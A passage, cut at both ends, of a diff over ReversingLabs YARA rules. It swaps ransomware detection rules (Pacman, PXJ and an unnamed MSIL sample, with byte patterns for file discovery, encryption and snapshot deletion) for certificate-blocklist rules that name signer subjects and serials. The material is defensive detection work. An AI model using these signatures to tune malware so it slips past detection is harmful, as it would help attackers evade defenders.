- ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2D ?? 72 ?? ?? ?? ?? 28 ?? ?? - ?? ?? 2C ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 0C 28 ?? ?? ?? ?? 16 28 ?? ?? - ?? ?? 02 8E 39 ?? ?? ?? ?? 02 16 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 16 0D - 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 17 0D 20 ?? ?? ?? ?? - 28 ?? ?? ?? ?? 1F ?? 1B 28 ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 13 ?? 6F ?? ?? ?? ?? 13 ?? 28 - ?? ?? ?? ?? 72 ?? ?? ?? ?? 08 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? - 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 25 11 ?? 16 11 - ?? 8E 69 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 8D ?? ?? ?? ?? 13 ?? 1C 8D ?? ?? ?? ?? 25 16 - 72 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? - A2 25 1A 72 ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 13 ?? 1F ?? 8D ?? ?? ?? ?? 25 16 72 - ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2 - 25 1A 72 ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 25 1C 72 ?? ?? ?? ?? A2 25 1D 72 ?? ?? - ?? ?? A2 25 1E 72 ?? ?? ?? ?? A2 25 1F ?? 72 ?? ?? ?? ?? A2 25 1F ?? 72 - } - $find_files_p2 = { - A2 13 ?? 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 6F ?? - ?? ?? ?? 6F ?? ?? ?? ?? 1C 32 ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? - 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 72 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? - 72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 13 ?? - 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 72 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? - ?? ?? 2C ?? 12 ?? 11 ?? 8E 69 17 58 28 ?? ?? ?? ?? 11 ?? 11 ?? 16 6F ?? ?? ?? ?? 11 ?? - A2 2B - } - condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ($internal_encrypt_file) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Guangzhou YuanLuo Technology Co.,Ltd" and pe.signatures[i].serial=="0b:72:79:06:8b:eb:15:ff:e8:06:0d:2c:56:15:3c:35" and 1350864000<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Pacman : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_0Bc0F18Da36702E302Db170D91Dc9202 : INFO FILE { meta: - description = "Yara rule that detects Pacman ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "a440769b-030b-5b72-a6f2-cf478dd7acd2" - date = "2021-08-12" - modified = "2021-08-12" + id = "977d9686-d811-5416-b090-d4f45d7935d0" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/ByteCode.MSIL.Ransomware.Pacman.yara#L1-L68" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0634303a4db2631edb40a9435444f3bdc4bc6eb745c7e43a54478e54e7507403" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16338-L16354" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d9ee2cf63a4edb28f894ea49a5b4df9b818d5764d9a74721b1d5222f53859462" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Pacman" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $pacman_find_encrypted_1 = { - 28 0A 00 00 06 [0-2] 6F 0D 00 00 06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2] 28 - 29 02 00 06 1F 1C 28 0E 04 00 06 [0-2] 7E 13 00 00 04 20 0F 03 00 00 28 2F 00 00 06 25 - 26 28 5D 02 00 06 [0-2] 28 6D 01 00 06 [0-2] 0B 07 13 06 16 13 05 2B 31 11 06 11 05 9A - 0C 28 0A 00 00 06 [0-2] 6F 0D 00 00 06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2] - 08 28 55 02 00 06 [0-2] 26 11 05 17 D6 13 05 11 05 11 06 8E B7 32 C7 1D 45 01 00 00 00 - F6 FF FF FF 17 2D 06 D0 1E 01 00 06 26 16 0A 38 BC 01 00 00 28 0A 00 00 06 [0-2] 6F 0D - 00 00 06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2] 06 28 AA 04 00 06 [0-2] 14 20 - B0 0F 00 00 28 2F 00 00 06 [0-2] 1F 0A 8D 76 00 00 01 13 07 11 07 16 20 BF 0F 00 00 28 - 2F 00 00 06 [0-2] A2 11 07 17 20 C2 0F 00 00 28 2F 00 00 06 [0-2] A2 11 07 18 20 C5 0F - 00 00 28 2F 00 00 06 [0-2] A2 11 07 19 20 C8 0F 00 00 28 2F 00 00 06 [0-2] A2 11 07 1A - 20 CB 0F 00 00 28 2F 00 00 06 [0-2] A2 11 07 1B 20 CE 0F 00 00 28 2F 00 00 06 [0-2] A2 - } - $pacman_find_encrypted_2 = { - 11 07 1C 20 D1 0F 00 00 28 2F 00 00 06 [0-2] A2 11 07 1D 20 D4 0F 00 00 28 2F 00 00 06 - [0-2] A2 11 07 1E 20 C2 0F 00 00 28 2F 00 00 06 [0-2] A2 11 07 1F 09 20 D7 0F 00 00 28 - 2F 00 00 06 [0-2] A2 11 07 14 14 14 28 7A 04 00 06 [0-2] 28 E2 05 00 06 [0-2] 0D 28 07 - 00 00 06 28 1A 04 00 06 [0-2] 28 0A 00 00 06 [0-2] 6F 0D 00 00 06 [0-2] 6F 33 00 00 06 - [0-2] 28 FD 01 00 06 [0-2] 06 28 AA 04 00 06 [0-2] 28 E2 05 00 06 [0-2] 28 36 05 00 06 - [0-2] 2C 78 1A 45 01 00 00 00 F6 FF FF FF 7E 16 00 00 04 28 9D 02 00 06 [0-2] 28 0A 00 - 00 06 [0-2] 6F 0D 00 00 06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2] 06 28 AA 04 - 00 06 [0-2] 28 E2 05 00 06 [0-2] 09 16 28 23 01 00 06 28 0A 00 00 06 [0-2] 6F 0D 00 00 - 06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2] 06 28 AA 04 00 06 [0-2] 28 E2 05 00 - 06 [0-2] 28 66 04 00 06 DE 0F 25 28 4E 04 00 06 13 04 28 02 03 00 06 DE 00 06 17 D6 0A - 06 28 0A 00 00 06 [0-2] 6F 0D 00 00 06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2] - 28 E2 04 00 06 [0-2] 3F 1B FE FF FF 1B 45 01 00 00 00 F6 FF FF FF 28 28 00 00 06 2A - } - $pacman_encrypt = { - 28 65 02 00 06 [0-2] 0A 16 13 05 20 00 04 00 00 13 07 06 11 07 28 2A 05 00 06 [0-2] 2C - 19 1C 45 01 00 00 00 F6 FF FF FF 17 2D 06 D0 20 01 00 06 26 11 07 13 05 2B 15 11 07 15 - D6 13 07 11 07 17 2F D0 17 45 01 00 00 00 F6 FF FF FF 20 DA 0F 00 00 28 2F 00 00 06 [0-2] - 11 05 28 9D 02 00 06 [0-2] 28 E2 02 00 06 [0-2] 28 6E 03 00 06 06 28 0A 03 00 06 [0-2] - 0B 14 13 04 14 0D 1F 0E 8D 25 00 00 01 13 0B 11 0B 16 ?? 9C 11 0B 17 ?? 9C 11 0B 18 - ?? 9C 11 0B 19 ?? 9C 11 0B 1A ?? 9C 11 0B 1B ?? 9C 11 0B 1C ?? 9C 11 0B 1D ?? 9C 11 0B - 1E 20 ?? ?? ?? ?? 9C 11 0B 1F 09 20 ?? ?? ?? ?? 9C 11 0B 1F 0A 20 ?? ?? ?? ?? 9C 11 0B - 1F 0B 1F ?? 9C 11 0B 1F 0C 1F ?? 9C 11 0B 1F 0D 1F ?? 9C 11 0B 13 06 02 11 06 11 05 07 - 12 04 12 03 28 1F 01 00 06 05 2C 18 18 45 01 00 00 00 F6 FF FF FF 06 11 04 09 28 96 03 - 00 06 [0-2] 0C 2B 0C 06 11 04 09 28 7E 05 00 06 [0-2] 0C 04 08 17 28 45 01 00 06 [0-2] - 13 08 20 01 04 00 00 8D 25 00 00 01 13 09 03 11 09 16 20 00 04 00 00 28 3A 03 00 06 [0-2] - 13 0A 11 0A 16 33 0C 1D 45 01 00 00 00 F6 FF FF FF DE 24 11 08 11 09 16 11 0A 28 F6 04 - 00 06 2B CF 11 08 2C 11 18 45 01 00 00 00 F6 FF FF FF 11 08 28 1E 03 00 06 DC DE 0C 28 - 4E 04 00 06 28 02 03 00 06 DE 00 08 28 1E 03 00 06 2A - } - condition: - uint16(0)==0x5A4D and ($pacman_find_encrypted_1 and $pacman_find_encrypted_2 and $pacman_encrypt) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Foresee Consulting Inc." and pe.signatures[i].serial=="0b:c0:f1:8d:a3:67:02:e3:02:db:17:0d:91:dc:92:02" and 1637712000<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_PXJ : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_Ca9B6F49B8B41204A174C751C73Dc393 : INFO FILE { meta: - description = "Yara rule that detects PXJ ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "c1549905-5b31-55c0-a275-0ab8133b3504" - date = "2020-07-15" - modified = "2020-07-15" + id = "d09658e4-44e4-5c10-a866-ba486000f1b6" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.PXJ.yara#L1-L158" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e88d27dcd7ad3af459bd7e34fcc827822365441446b0e4e7bbec399c9a948cb7" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16356-L16374" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0b6558a7a1b78d471aaadced959ba91e411df50e3cc08e447fe9bd97f9e5cced" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "PXJ" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files_p1 = { - 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 8B D9 68 ?? ?? ?? ?? - 33 F6 8D 8D ?? ?? ?? ?? 33 C0 56 51 89 9D ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 83 C4 ?? 53 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? - ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? - ?? ?? 8A 85 ?? ?? ?? ?? A8 ?? 0F 85 ?? ?? ?? ?? A8 ?? 0F 84 ?? ?? ?? ?? 53 8D 85 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? - ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 - E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 - E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? E9 ?? ?? - ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ?? 66 8B - 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? - 3B C6 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 - } - $find_files_p2 = { - 3B D6 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33 C0 EB - ?? 1B C0 83 D8 ?? 3B C6 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 9F ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? E9 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B FF - 66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 - ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B C6 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? - 8D 85 ?? ?? ?? ?? 8B FF 66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ?? 66 8B 50 ?? 66 3B 51 - ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B C6 0F 84 ?? - ?? ?? ?? 53 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? - ?? ?? 52 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 85 - ?? ?? ?? ?? 8B D1 83 C4 ?? 0B D0 89 B5 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 74 ?? 50 51 8D - 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 3A C1 75 ?? 01 8F ?? ?? ?? ?? 11 - B7 ?? ?? ?? ?? EB ?? 01 8F ?? ?? ?? ?? 11 B7 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? - ?? ?? ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 - ?? ?? ?? ?? 8B 4D ?? 5E 33 CD B0 ?? 5B E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $encrypt_files_p1 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 - ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 45 ?? 6A ?? 68 - ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 89 85 ?? ?? ?? ?? 8B 45 ?? 68 ?? ?? ?? ?? 50 89 85 ?? - ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 4D - ?? 8B 55 ?? 51 52 E8 ?? ?? ?? ?? 0B C2 74 ?? 53 FF 15 ?? ?? ?? ?? B0 ?? E9 ?? ?? ?? - ?? 68 ?? ?? ?? ?? 33 DB 8D 85 ?? ?? ?? ?? 53 50 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? - 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 53 51 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 - C4 ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 33 F6 6A ?? 53 E8 ?? ?? ?? ?? 88 44 35 ?? - 46 83 FE ?? 7C ?? 8D 55 ?? 52 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? - ?? ?? ?? 8D B5 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? - ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B CE 89 5D ?? E8 ?? ?? ?? ?? 81 EC ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B F4 89 A5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? 6A ?? 51 - } - $encrypt_files_p2 = { - 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 72 ?? 8B 95 - ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B B5 ?? ?? ?? ?? 53 53 33 C9 51 33 C0 50 56 - FF 15 ?? ?? ?? ?? 85 C0 75 ?? 56 FF 15 ?? ?? ?? ?? 32 C0 E9 ?? ?? ?? ?? 53 8D 85 ?? - ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 56 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? - ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? - 8B 3D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B C3 0F 84 ?? ?? ?? ?? 6A ?? F7 D8 99 53 52 50 - 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 - 8D 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 8D 8D ?? ?? ?? ?? 51 50 8D - 95 ?? ?? ?? ?? 52 56 FF D7 85 C0 0F 84 ?? ?? ?? ?? 39 9D ?? ?? ?? ?? 0F 84 ?? ?? ?? - ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 39 9D ?? ?? ?? ?? 77 ?? 81 BD ?? - ?? ?? ?? ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 11 9D ?? ?? ?? ?? 8B 9D - ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 33 D2 52 52 52 33 C9 51 50 - FF 15 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B C6 8D - } - $encrypt_files_p3 = { - 48 ?? 8B FF 66 8B 10 83 C0 ?? 66 85 D2 75 ?? 2B C1 6A ?? D1 F8 8D 8D ?? ?? ?? ?? 51 - 8D 14 00 8B 83 ?? ?? ?? ?? 52 56 50 FF D7 8B 93 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? - 51 6A ?? 68 ?? ?? ?? ?? 52 FF D7 8B 93 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? - 8D 4D ?? 51 52 FF D7 8B 8B ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? - ?? 51 FF D7 8B 8B ?? ?? ?? ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 6A ?? 8D 85 ?? ?? ?? ?? 50 - 51 FF D7 8B B5 ?? ?? ?? ?? 6A ?? 33 C9 51 51 B8 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? - 85 C0 74 ?? 33 DB EB ?? 83 85 ?? ?? ?? ?? ?? 11 9D ?? ?? ?? ?? 53 8D 95 ?? ?? ?? ?? - 52 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? - ?? 8B 9D ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 51 52 8D BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 95 - ?? ?? ?? ?? 83 C4 ?? 52 FF 15 ?? ?? ?? ?? 33 C9 51 51 33 C0 51 50 8B 83 ?? ?? ?? ?? - 50 FF 15 ?? ?? ?? ?? 8B 8B ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 56 - E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 94 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B - 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 - } - $delete_volumes_snapshots_p1 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? - 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 45 ?? 6A ?? 33 FF 57 57 89 - 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? FF D6 57 68 ?? - ?? ?? ?? FF D6 57 68 ?? ?? ?? ?? FF D6 57 68 ?? ?? ?? ?? FF D6 57 68 ?? ?? ?? ?? FF - D6 57 57 8D 8D ?? ?? ?? ?? 51 57 89 BD ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? - ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ?? - 6A ?? 57 57 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F - 84 ?? ?? ?? ?? 83 EC ?? 8B F4 89 7E ?? C7 46 ?? ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? ?? - ?? ?? 89 A5 ?? ?? ?? ?? C6 06 ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 - C4 ?? 33 FF 89 7D ?? 83 78 ?? ?? 72 ?? 8B 00 8D 50 ?? 8D 9B ?? ?? ?? ?? 8A 08 40 84 - C9 75 ?? 2B C2 57 8D 95 ?? ?? ?? ?? 52 50 83 EC ?? 8B F4 89 7E ?? C7 46 ?? ?? ?? ?? - ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 A5 ?? ?? ?? ?? 88 0E E8 ?? ?? ?? ?? 8D B5 ?? ?? - ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 83 C4 ?? 39 70 ?? 72 ?? 8B 00 50 53 FF 15 ?? ?? - ?? ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? - ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? - ?? ?? ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 53 FF - 15 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B C7 8B FF 66 8B 10 66 3B 11 75 ?? - 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 - } - $delete_volumes_snapshots_p2 = { - EB ?? 1B C0 83 D8 ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 89 85 - ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? EB ?? 8D 64 24 ?? 8B BD ?? ?? ?? ?? BA ?? ?? ?? ?? 8B - CE D3 E2 85 95 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 4E ?? 66 89 8D ?? ?? ?? ?? 33 C9 6A - ?? 51 8D 95 ?? ?? ?? ?? 52 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? E8 ?? - ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? - 83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 9F ?? - ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 83 - C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF - 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 83 EC ?? B8 ?? ?? ?? ?? 8B CC 89 A5 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? - ?? ?? 83 78 ?? ?? 72 ?? 8B 00 8D 50 ?? 8D A4 24 ?? ?? ?? ?? 8A 08 40 84 C9 75 ?? 33 - FF 57 8D 8D ?? ?? ?? ?? 51 2B C2 50 83 EC ?? B8 ?? ?? ?? ?? 8B CC 89 A5 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 83 C4 ?? 39 70 ?? 72 - ?? 8B 00 50 53 FF 15 ?? ?? ?? ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? - ?? ?? ?? 83 C4 ?? BE ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 89 B5 ?? - ?? ?? ?? 89 BD ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 72 ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? - ?? ?? 83 C4 ?? 53 89 B5 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? FF 15 ?? - ?? ?? ?? 8B B5 ?? ?? ?? ?? 46 89 B5 ?? ?? ?? ?? 83 FE ?? 0F 8C ?? ?? ?? ?? EB ?? 57 - 8D 9F ?? ?? ?? ?? E8 ?? ?? ?? ?? B0 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B - 4D ?? 33 